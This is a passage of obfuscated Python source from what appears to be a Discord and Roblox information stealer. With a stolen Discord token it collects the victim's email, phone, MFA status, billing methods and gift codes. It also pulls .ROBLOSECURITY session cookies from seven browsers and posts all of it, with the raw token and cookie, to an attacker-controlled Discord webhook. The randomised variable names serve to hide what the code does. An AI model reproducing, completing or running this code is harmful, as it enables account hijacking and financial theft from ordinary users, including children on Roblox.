            MZRYXRNHARYKKIXGTCMERBEWQLOKMPZHNMKLBUVDLUOQWWKSKYBVNIIGEEMBYIDOQDWFVEMGMSUGANNVFBVRWQIQJPJ = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('global_name', "None")
            QHRZPMIVDJKVWWCQGDCGASBEHLHIXLCHMVNLKDWMNXFYMTYLNLDXWRVFZMASKE = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('id', "None")
            IEWHPWPOYCEVVWWTEPRQXZKDXELBCHOUQXQTPIXWWZHISAADUBQEON = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('email', "None")
            VWMKCOBBNOJVNVQUETEKCBBXLVVMNOWVGSUIHLQOFWWUOTKBZMXGMVYSIASGWVQYYATLEZSUHUTBMUU = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('verified', "None")
            OXKKGJBGUWJYSGFHFWIDVSOQQZVWYLADKLEAFKFHQKHQETUEXUYWADK = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('phone', "None")
            UAYCYKPCYAYGAPXUFLHZYEFTXFJDRVSDFIRFUOOZHWEPKQYGJBJKTHKAXSWDPLBOL = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('locale', "None")
            NXSVBNOTZXRGGJIEIOOKHBLLFYWSLDWYFYRNAKNQYOITZMHBZZAOXK = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('mfa_enabled', "None")

            try:
                if XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('premium_type', 'None') == 0:
                    YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL = 'False'
                elif XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('premium_type', 'None') == 1:
                    YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL = 'Nitro Classic'
                elif XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('premium_type', 'None') == 2:
                    YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL = 'Nitro Boosts'
                elif XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('premium_type', 'None') == 3:
                    YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL = 'Nitro Basic'
                else:
                    YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL = 'False'
            except:
                YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL = "None"

            try: 
                PZJOFPCEMYCLREGUFATXOVBQZHUIMHYZWFSGNCIVBIKVDIAGAEYOHEIQUJIRTECUUURYHYTO = f"https://cdn.discordapp.com/avatars/{QHRZPMIVDJKVWWCQGDCGASBEHLHIXLCHMVNLKDWMNXFYMTYLNLDXWRVFZMASKE}/{XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{QHRZPMIVDJKVWWCQGDCGASBEHLHIXLCHMVNLKDWMNXFYMTYLNLDXWRVFZMASKE}/{XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{QHRZPMIVDJKVWWCQGDCGASBEHLHIXLCHMVNLKDWMNXFYMTYLNLDXWRVFZMASKE}/{XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII['avatar']}.png"
            except: 
                PZJOFPCEMYCLREGUFATXOVBQZHUIMHYZWFSGNCIVBIKVDIAGAEYOHEIQUJIRTECUUURYHYTO = TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ

            try:
                DGNOKCLEXOVYAXTHXWGQPTRUISYBAFGCAVVEMLIDAIDYCPHDOZGMXXZJUXMPBMIBVKFEKXNEPBQJLQXNBZUAWC = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI_d15c0rd}).json()
                if DGNOKCLEXOVYAXTHXWGQPTRUISYBAFGCAVVEMLIDAIDYCPHDOZGMXXZJUXMPBMIBVKFEKXNEPBQJLQXNBZUAWC:
                    IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW = []

                    for v4r_method in DGNOKCLEXOVYAXTHXWGQPTRUISYBAFGCAVVEMLIDAIDYCPHDOZGMXXZJUXMPBMIBVKFEKXNEPBQJLQXNBZUAWC:
                        if v4r_method['type'] == 1:
                            IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW.append('CB')
                        elif v4r_method['type'] == 2:
                            IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW.append("Paypal")
                        else:
                            IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW.append('Other')
                    IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW = ' / '.join(IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW)
                else:
                    IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW = "None"
            except:
                IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW = "None"

            try:
                CDKFSKCYIDERLHNMOFEAVOEBWQTIPMPIYQEXGFSJEAPSNJKCDLPJTJAJDQEMNFMGBTXOYNRBIUBJMTWAKMXPLPUFTXXINJUIN = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI_d15c0rd}).json()
                if CDKFSKCYIDERLHNMOFEAVOEBWQTIPMPIYQEXGFSJEAPSNJKCDLPJTJAJDQEMNFMGBTXOYNRBIUBJMTWAKMXPLPUFTXXINJUIN:
                    JXXPHTXLCXZMYWAWPWBWRXCJSFXEATTCEDSFHZEICJURFLIWYERMAMYBVFGDPBFCL = []
                    for GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH in CDKFSKCYIDERLHNMOFEAVOEBWQTIPMPIYQEXGFSJEAPSNJKCDLPJTJAJDQEMNFMGBTXOYNRBIUBJMTWAKMXPLPUFTXXINJUIN:
                        QEGKLOAPTBSPMOJOFPSKSUADBKOFHWOQLDSINQLAUPMJEXEQWKWBSSXQOFNVBLAOGJYYHLSSZYPJXQSEFN = GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH['promotion']['outbound_title']
                        GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH = GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH['code']
                        ZZWPCTXKYREFBQJFYKCVEYOSXRQRTETNFVQDLCHDZBYMJUXXNQGYMQHHWBFFNXQLH = f"Gift: {QEGKLOAPTBSPMOJOFPSKSUADBKOFHWOQLDSINQLAUPMJEXEQWKWBSSXQOFNVBLAOGJYYHLSSZYPJXQSEFN}\nCode: {GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH}"
                        if len('\n\n'.join(GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH)) + len(ZZWPCTXKYREFBQJFYKCVEYOSXRQRTETNFVQDLCHDZBYMJUXXNQGYMQHHWBFFNXQLH) >= 1024:
                            break
                        JXXPHTXLCXZMYWAWPWBWRXCJSFXEATTCEDSFHZEICJURFLIWYERMAMYBVFGDPBFCL.append(ZZWPCTXKYREFBQJFYKCVEYOSXRQRTETNFVQDLCHDZBYMJUXXNQGYMQHHWBFFNXQLH)
                    if len(JXXPHTXLCXZMYWAWPWBWRXCJSFXEATTCEDSFHZEICJURFLIWYERMAMYBVFGDPBFCL) > 0:
                        GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH = '\n\n'.join(JXXPHTXLCXZMYWAWPWBWRXCJSFXEATTCEDSFHZEICJURFLIWYERMAMYBVFGDPBFCL)
                    else:
                        GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH = "None"
                else:
                    GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH = "None"
            except:
                GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH = "None"
        
            v4r_software_name, FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL = GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW.get(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD} "{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}"`:', color=PFHVDVLRCIKQFKZKMAXBUFSXESZFEQFFSDQHJIHCEWODXJJGXJXVVQYBNPUCBUSRCOPDHXXOWNPCZMMABKVJTUWEUU)      
            embed.add_field(name=":file_folder: Path:", value=f"```{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{RONCHLDFULPAIYNULEEOTKSYKZTFFLLPAITRLYQKIPCWQKTOUJGLWTSDHWHCR}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{MZRYXRNHARYKKIXGTCMERBEWQLOKMPZHNMKLBUVDLUOQWWKSKYBVNIIGEEMBYIDOQDWFVEMGMSUGANNVFBVRWQIQJPJ}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{QHRZPMIVDJKVWWCQGDCGASBEHLHIXLCHMVNLKDWMNXFYMTYLNLDXWRVFZMASKE}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{IEWHPWPOYCEVVWWTEPRQXZKDXELBCHOUQXQTPIXWWZHISAADUBQEON}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{VWMKCOBBNOJVNVQUETEKCBBXLVVMNOWVGSUIHLQOFWWUOTKBZMXGMVYSIASGWVQYYATLEZSUHUTBMUU}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{OXKKGJBGUWJYSGFHFWIDVSOQQZVWYLADKLEAFKFHQKHQETUEXUYWADK}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{YCOFUSMUOWYCNEZGHWFFNCXTSOEWUFPOIIOQUWSKHVXUKPPEGZBNKIYKVDRVDVFXDYJXEVHXBUVKBDYVMJITFYRXMLJVNBIL}```", inline=True)
            embed.add_field(name=":earth_africa: Language:", value=f"```{UAYCYKPCYAYGAPXUFLHZYEFTXFJDRVSDFIRFUOOZHWEPKQYGJBJKTHKAXSWDPLBOL}```", inline=True)
            embed.add_field(name=":moneybag: Billing:", value=f"```{IBZQOUQOTPYUSLAETKZHYZXSZTAWHJOOVMGZRGDQFICWDOWLBGBUOWKYZQWRWYFXRRFDNUWNPYZLQUBGLMRPWPYFHUBZW}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{GTCGPGTAAOXNUOLMRDWUFDQTGDFLABQDRETCKCPGDGMSIPOXAOAVVTYGSJJNKXBECXXUSFIOHHBLMMAWRSAQVDOH}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{NXSVBNOTZXRGGJIEIOOKHBLLFYWSLDWYFYRNAKNQYOITZMHBZZAOXK}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=PZJOFPCEMYCLREGUFATXOVBQZHUIMHYZWFSGNCIVBIKVDIAGAEYOHEIQUJIRTECUUURYHYTO)
            embed.set_footer(text=KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC, icon_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)
            BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC.send(embed=embed, username=IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI, avatar_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)

    upload_t0k3n5()

def R0b10x_C00ki3():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook, Embed
    import discord

    LGXIZVWQIOAZZFJBYIBWLAOGJSNXJFHXCXHNNWZKJPXMTOQULJFNXQGDWUCCQZYGRXVEEEBOLXCMTMXOUEB = []
    def g3t_c00ki3_4nd_n4vig4t0r(TNIUHBBLLEOEGKPWFJJVZSLNVRZPHPSAPMZNYEDITZVUHDYSSZADDMAVNAAHVZFSHIRKUDNMGBKIJGLEMLGGWBN):
        try:
            v4r_c00kie5 = TNIUHBBLLEOEGKPWFJJVZSLNVRZPHPSAPMZNYEDITZVUHDYSSZADDMAVNAAHVZFSHIRKUDNMGBKIJGLEMLGGWBN()
            v4r_c00kie5 = str(v4r_c00kie5)
            v4r_c00kie = v4r_c00kie5.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            v4r_n4vigator = TNIUHBBLLEOEGKPWFJJVZSLNVRZPHPSAPMZNYEDITZVUHDYSSZADDMAVNAAHVZFSHIRKUDNMGBKIJGLEMLGGWBN.__name__
            return v4r_c00kie, v4r_n4vigator
        except:
            return None, None

    def Microsoft_Edge():
        return browser_cookie3.edge(domain_name="roblox.com")

    def Google_Chrome():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def Firefox():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def Opera():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def Opera_GX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def Safari():
        return browser_cookie3.safari(domain_name="roblox.com")

    def Brave():
        return browser_cookie3.brave(domain_name="roblox.com")

    PZDEXKNVAVOYXJGPVJNJQSJUVMRKCMWTRKLHSTDHQMNJINXBEVBXCGGFZWKZSBUGAWQVEZGQAJEWUZGKCISFPIWLTBJCVCNZZNAA = [Microsoft_Edge, Google_Chrome, Firefox, Opera, Opera_GX, Safari, Brave]
    for v4r_br0ws3r in PZDEXKNVAVOYXJGPVJNJQSJUVMRKCMWTRKLHSTDHQMNJINXBEVBXCGGFZWKZSBUGAWQVEZGQAJEWUZGKCISFPIWLTBJCVCNZZNAA:
        v4r_c00ki3, v4r_n4vigator = g3t_c00ki3_4nd_n4vig4t0r(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in LGXIZVWQIOAZZFJBYIBWLAOGJSNXJFHXCXHNNWZKJPXMTOQULJFNXQGDWUCCQZYGRXVEEEBOLXCMTMXOUEB:
                LGXIZVWQIOAZZFJBYIBWLAOGJSNXJFHXCXHNNWZKJPXMTOQULJFNXQGDWUCCQZYGRXVEEEBOLXCMTMXOUEB.append(v4r_c00ki3)
                try:
                    HZMKTDVHSLYYKKYJIWMSKWKNXWZXQDYQGWFLGBHEMBSSIDYMZOESD = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII = json.loads(HZMKTDVHSLYYKKYJIWMSKWKNXWZXQDYQGWFLGBHEMBSSIDYMZOESD.text)
                except:
                    pass

                VKADGVIMLSNZMZTFTJQGXLBLXYEISZXMXHQAYYDFXNIABYHFBLJWBZGPMOBTYCIZXOEDDGWSPDJESLREMMZLQO = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('id', "None")
                YROSESFODGSTKLEJSEPNMCTMMZXCAMTXCJDZAJEWYZSMLRWRWYDIGVOLY = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('displayName', "None")
                WANLFAMDBFFUOYWNRFYVHCRNONNYDAOIGWEZFBAQKDCFVNZEAAXPETGHAHIFBMJAYKHSBXKDLEUIMVZHBLHKN = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('name', "None")
                IJGBZMWDTKRRMRYLNBPINLHEHIGYLKNQGCPLGYNPVIKFQTBOKJJOOJQASGDWUABUSQPAEGXJDTM = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get("RobuxBalance", "None")
                ZCQDVKIOAURKPRCENCIGZMPFTQYVPHYMWONTDPOYMVMUKNMWIAORRXTITAHQVOVTTJVDFQPBMEVNVPIGTK = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get("IsPremium", "None")
                NXSBAALBJBJBZTPFMCFKCOXWVIDXMQFCYWLYBCBRRGKTBMUTOPZNAOJFJVLGSVWOSZINBENBPQMINPQJWYSR = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get("ThumbnailUrl", "None")
                ORZMDFYIFQPZQYLRELIQYUEZSGXNFLTMYTOXJIPGRKSAOMMXBOFAMTZVBPWBVXUTEDTZEVBFATYEHWXHCRCZWRJ = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get("IsAnyBuildersClubMember", "None")
        
                HJDUTZEDYGVWUUPFMPHMTVURSZXCFYLJQGLGVFMPAXJXWJOPHAVEYMGCWSGG = len(v4r_c00ki3)
                TECVIJDZEAMEPQZTLBCKWXKFSQKOSONHNWFCPGWZCDCNXZEFSAHVO = HJDUTZEDYGVWUUPFMPHMTVURSZXCFYLJQGLGVFMPAXJXWJOPHAVEYMGCWSGG // 2
                ROJPLOGHGMNOAOICEAOXZVIJRADRSRZVECVUJKRLPYOQJJQLTFJGLRPRZDOUMVJPCRUCBIYEBWLSOSTOVXPANGJY = v4r_c00ki3[:TECVIJDZEAMEPQZTLBCKWXKFSQKOSONHNWFCPGWZCDCNXZEFSAHVO]
                ZVSQTKDOMWEUTBOXIPZXBVKEZLJAMHXOLHKQTRQYXAMCZRVGIKMWPPTGWHVNYWE = v4r_c00ki3[TECVIJDZEAMEPQZTLBCKWXKFSQKOSONHNWFCPGWZCDCNXZEFSAHVO:]

                BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC = SyncWebhook.from_url(BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ)

                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR = discord.Embed(
                    title=f'Roblox Cookie `{BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD} "{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}"`:',
                    color=PFHVDVLRCIKQFKZKMAXBUFSXESZFEQFFSDQHJIHCEWODXJJGXJXVVQYBNPUCBUSRCOPDHXXOWNPCZMMABKVJTUWEUU
                )
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.set_footer(text=KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC, icon_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.set_thumbnail(url=NXSBAALBJBJBZTPFMCFKCOXWVIDXMQFCYWLYBCBRRGKTBMUTOPZNAOJFJVLGSVWOSZINBENBPQMINPQJWYSR)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":compass: Navigator:", value=f"```{v4r_n4vigator}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":bust_in_silhouette: Username:", value=f"```{WANLFAMDBFFUOYWNRFYVHCRNONNYDAOIGWEZFBAQKDCFVNZEAAXPETGHAHIFBMJAYKHSBXKDLEUIMVZHBLHKN}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":bust_in_silhouette: DisplayName:", value=f"```{YROSESFODGSTKLEJSEPNMCTMMZXCAMTXCJDZAJEWYZSMLRWRWYDIGVOLY}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":robot: Id:", value=f"```{VKADGVIMLSNZMZTFTJQGXLBLXYEISZXMXHQAYYDFXNIABYHFBLJWBZGPMOBTYCIZXOEDDGWSPDJESLREMMZLQO}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":moneybag: Robux:", value=f"```{IJGBZMWDTKRRMRYLNBPINLHEHIGYLKNQGCPLGYNPVIKFQTBOKJJOOJQASGDWUABUSQPAEGXJDTM}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":tickets: Premium:", value=f"```{ZCQDVKIOAURKPRCENCIGZMPFTQYVPHYMWONTDPOYMVMUKNMWIAORRXTITAHQVOVTTJVDFQPBMEVNVPIGTK}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":construction_site: Builders Club:", value=f"```{ORZMDFYIFQPZQYLRELIQYUEZSGXNFLTMYTOXJIPGRKSAOMMXBOFAMTZVBPWBVXUTEDTZEVBFATYEHWXHCRCZWRJ}```", inline=True)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":cookie: Cookie Part 1:", value=f"```{ROJPLOGHGMNOAOICEAOXZVIJRADRSRZVECVUJKRLPYOQJJQLTFJGLRPRZDOUMVJPCRUCBIYEBWLSOSTOVXPANGJY}```", inline=False)
                IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.add_field(name=":cookie: Cookie Part 2:", value=f"```{ZVSQTKDOMWEUTBOXIPZXBVKEZLJAMHXOLHKQTRQYXAMCZRVGIKMWPPTGWHVNYWE}```", inline=False)

                BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC.send(embed=IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR, username=IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI,
                                avatar_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)
                
    if not LGXIZVWQIOAZZFJBYIBWLAOGJSNXJFHXCXHNNWZKJPXMTOQULJFNXQGDWUCCQZYGRXVEEEBOLXCMTMXOUEB:
        BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC = SyncWebhook.from_url(BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ)
        IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR = Embed(
            title=f'Roblox Cookie `{BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD} "{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}"`:', 
            description=f"No roblox cookie found.",
